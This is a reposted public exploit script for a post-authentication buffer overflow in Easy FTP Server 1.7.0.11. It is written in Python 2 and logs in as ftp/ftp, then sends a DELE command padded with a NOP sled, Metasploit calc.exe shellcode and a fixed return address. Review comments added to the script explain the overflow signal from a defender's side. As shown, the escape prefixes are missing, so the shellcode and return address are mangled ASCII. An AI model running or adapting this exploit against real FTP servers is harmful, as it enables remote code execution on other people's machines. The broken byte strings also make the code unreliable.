Easy FTP Server v1.7.0.11 Multiple Commands Buffer Overflow
Posted on 12 August 2010
===================================================================
Easy FTP Server v1.7.0.11 Multiple Commands Buffer Overflow Exploit
===================================================================
# Note: RNFR, DELE, RMD, STOR commands share the same offset
#
# Exploit Title: Easy FTP Server v1.7.0.11 DELE Command Remote Buffer Overflow Exploit (Post Auth)
# Date: August 08, 2010
# Author: Glafkos Charalambous
# Version: 1.7.0.11
# Tested on: Windows XP SP3 En
#
# NOTE(review): Python 2 script (print statements). Defender's reading: after
# a plain-text FTP login the script sends one DELE command whose argument is
# sized by `buffersize` plus a 4-byte return address. An FTP command argument
# that long is the observable signal for this class of overflow; the note
# above says RNFR, RMD and STOR reach the same overwrite at the same offset,
# so any of those four commands with an oversized argument should be treated
# alike. The header marks this as post-auth: valid credentials are required.

import socket
import sys

# Two positional arguments: the FTP server address and its port.
if len(sys.argv) != 3:
    print "Usage: ./easyftp_DELE.py <Target IP> <Port>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# Number of bytes of the DELE argument that sit before the saved return
# address (which `eip` below overwrites).
buffersize = 268

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
# NOTE(review): as rendered on this page the "\x" escape prefixes are
# missing, so these literals are plain ASCII text rather than the 227 bytes
# the header claims; len(shellcode) here is therefore not what the offset
# arithmetic below assumes.
shellcode = ("xd9xecxbax4cx61x82xbcxd9x74x24xf4x33xc9xb1x33"
             "x58x31x50x17x83xe8xfcx03x1cx72x60x49x60x9cxed"
             "xb2x98x5dx8ex3bx7dx6cx9cx58xf6xddx10x2ax5axee"
             "xdbx7ex4ex65xa9x56x61xcex04x81x4cxcfxa8x0dx02"
             "x13xaaxf1x58x40x0cxcbx93x95x4dx0cxc9x56x1fxc5"
             "x86xc5xb0x62xdaxd5xb1xa4x51x65xcaxc1xa5x12x60"
             "xcbxf5x8bxffx83xedxa0x58x34x0cx64xbbx08x47x01"
             "x08xfax56xc3x40x03x69x2bx0ex3ax46xa6x4ex7ax60"
             "x59x25x70x93xe4x3ex43xeex32xcax56x48xb0x6cxb3"
             "x69x15xeax30x65xd2x78x1ex69xe5xadx14x95x6ex50"
             "xfbx1cx34x77xdfx45xeex16x46x23x41x26x98x8bx3e"
             "x82xd2x39x2axb4xb8x57xadx34xc7x1exadx46xc8x30"
             "xc6x77x43xdfx91x87x86xa4x6exc2x8bx8cxe6x8bx59"
             "x8dx6ax2cxb4xd1x92xafx3dxa9x60xafx37xacx2dx77"
             "xabxdcx3ex12xcbx73x3ex37xa8x12xacxdbx01xb1x54"
             "x79x5e")

# Return address: a fixed CALL EDI inside user32.dll on the tested build
# (Windows XP SP3), so the exploit depends on that library loading at the
# same base address; the same escape loss noted above applies here.
eip = "x91xC8x41x7E" # CALL EDI - user32.dll
nopsled = "x90" * 16
# Filler so that nopsled + shellcode + junk spans exactly `buffersize` bytes
# (negative counts yield an empty string, so the layout silently breaks if
# the shellcode is longer than expected).
junk = "x90" * (buffersize-(len(nopsled)+len(shellcode)))
payload = nopsled+shellcode+junk+eip

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, port))  # return value is never used
    print "[+] Connected"
except:  # bare except: any connect error (and KeyboardInterrupt) is reported as a failure
    print "[!] Connection Failed"
    sys.exit(0)  # exits with status 0 even though the connection failed

# Post-auth: logs in with the ftp/ftp credentials before sending the
# overflow, so the overflow is only reachable with a valid login.
s.recv(1024)
s.send('User ftp ')
s.recv(1024)
s.send('PASS ftp ')
s.recv(1024)
print "[+] Sending payload..."
# The oversized DELE argument is the overflow trigger; the socket is closed
# without checking the server's reply.
s.send('DELE '+payload+' ')
s.recv(1024)
s.close()

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-12]